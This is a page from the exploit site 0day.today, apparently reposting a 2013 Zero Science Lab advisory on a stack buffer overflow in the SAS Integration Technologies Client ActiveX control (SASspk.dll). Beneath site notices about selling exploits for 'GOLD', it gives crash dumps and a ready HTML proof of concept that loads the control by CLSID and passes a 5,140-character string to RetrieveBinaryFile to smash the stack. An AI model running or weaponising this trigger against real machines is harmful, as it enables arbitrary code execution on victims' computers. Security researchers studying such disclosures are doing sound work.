0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SAS Integration Technologies Client 9.31_M1 Buffer Overflow
<!-- SAS Integration Technologies Client 9.31_M1 (SASspk.dll) Stack-based Overflow Vendor: SAS Institute Inc. Product web page: http://www.sas.com Affected version: Deployment Manager 9.3.0.0 (Model 12.05, TS1M2) SAS Integration Technologies Client 9.31_M1 Summary: SAS Integration Technologies provides you with software that enables you to build a secure client/server infrastructure on which to implement SAS distributed processing solutions. With SAS Integration Technologies, you can integrate SAS with other applications in your enterprise; provide proactive delivery of information from SAS throughout the enterprise; extend the capabilities of SAS to meet your organization's specific needs; and develop your own distributed applications that leverage the analytic and reporting powers of SAS. The SAS Deployment Manager is used for post-installation configuration tasks such as configuring some products, applying hot fixes, updating metadata, and uninstalling SAS software. Desc: The SASspk module (SASspk.dll) version 9.310.0.11307, has a function called 'RetrieveBinaryFile()' which has one parameter called 'bstrFileName' which takes arguments as strings as defined in the function itself as ISPKBinaryFile from the SASPackageRetrieve library. Stack-based buffer overflow was discovered in one of the fuzzing processes that could allow arbitrary code execution by an attacker when exploiting the non-sanitized 'bstrFileName' parameter. ====================================================================== ArgDump: -------------------------------------------------- EBP+8 007EA404 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EBP+12 0016EB30 -> 00000000 EBP+16 00940E68 -> BAADF00D EBP+20 41414141 EBP+24 41414141 EBP+28 41414141 Stack Dump: -------------------------------------------------- 1699E0 60 0E 94 00 00 00 00 00 01 00 00 00 60 0E 94 00 [`...........`...] 1699F0 30 28 00 00 00 00 00 00 00 00 00 00 E4 EA 16 00 [................] 169A00 33 DF 4D 00 04 A4 7E 00 30 EB 16 00 68 0E 94 00 [..M.........h...] 169A10 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] 169A20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] ====================================================================== Tested on: Microsoft Windows 7 Ultimate SP1 EN (32/64bit) Microsoft Windows 7 Enterprise EN (32/64bit) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5142 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5142.php 20.04.2013 --> <html> <title>SAS Integration Technologies Client ActiveX Stack BoF 0-day</title> <body> <object id='smash' classid='clsid:DDF47362-6319-11D4-87C0-00C04F48BC53' /> <script> function run() { targetFile = "C:\Program Files\SASHome\x86\Integration Technologies\SASspk.dll" prototype = "Function RetrieveBinaryFile ( ByVal bstrFileName As String ) As ISPKBinaryFile" memberName = "RetrieveBinaryFile" progid = "SASPackageRetrieve.SPKRetrieve" argCount = 1 arg1=String(5140, "A") smash.RetrieveBinaryFile arg1 } </script><center><br /><br /> <input language=JavaScript onclick=run() type=button value="Test"> </center> </body> </html> # 0day.today [2024-11-15] #